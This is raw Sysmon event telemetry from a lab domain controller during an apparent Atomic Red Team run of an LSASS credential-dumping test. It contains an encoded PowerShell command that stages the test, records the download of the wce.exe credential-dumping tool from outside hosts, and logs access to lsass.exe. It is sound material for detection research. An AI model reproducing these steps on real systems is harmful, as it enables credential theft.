15:52:46.618{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004247Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.618{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CCE-5FA1-D400-000000008801}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004246Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.618{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CCE-5FA1-D400-000000008801}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004245Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.621{D28789B6-7CCE-5FA1-D400-000000008801}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 11241100x80000000000000004244Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:46.055{D28789B6-7CCD-5FA1-D200-000000008801}788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2cglhyim\2cglhyim.dll2020-11-03 15:52:45.976 10341000x80000000000000004243Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.039{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CCE-5FA1-D300-000000008801}640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004242Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.039{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004241Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.039{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004240Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.039{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004239Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.039{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004238Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.039{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004237Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.039{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004236Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.039{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004235Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.039{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004234Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.039{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004233Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.039{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CCE-5FA1-D300-000000008801}640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004232Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.039{D28789B6-7CCD-5FA1-D200-000000008801}7884748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7CCE-5FA1-D300-000000008801}640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004231Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:46.046{D28789B6-7CCE-5FA1-D300-000000008801}640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESB82F.tmp" "c:\Users\Administrator\AppData\Local\Temp\2cglhyim\CSCF089BC0C83EE4FA186B7A8E970B4333.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7CCD-5FA1-D200-000000008801}788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2cglhyim\2cglhyim.cmdline" 11241100x80000000000000004281Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:47.933{D28789B6-7CCE-5FA1-D500-000000008801}2212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce\wce.exe2020-11-03 15:52:47.933 354300x80000000000000004337Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.293{D28789B6-7CCE-5FA1-D500-000000008801}2212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50341-false155.133.130.34-443https 354300x80000000000000004336Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.006{D28789B6-7CCE-5FA1-D500-000000008801}2212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50340-false151.101.112.133-443https 10341000x80000000000000004335Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.496{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD0-5FA1-D800-000000008801}2872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004334Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.496{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD0-5FA1-D800-000000008801}2872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004333Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.449{D28789B6-7CD0-5FA1-D800-000000008801}2872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hu1cxunm.wqv.ps12020-11-03 15:52:48.449 10341000x80000000000000004332Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.449{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CD0-5FA1-D800-000000008801}2872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004331Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.418{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD0-5FA1-D800-000000008801}2872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004330Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 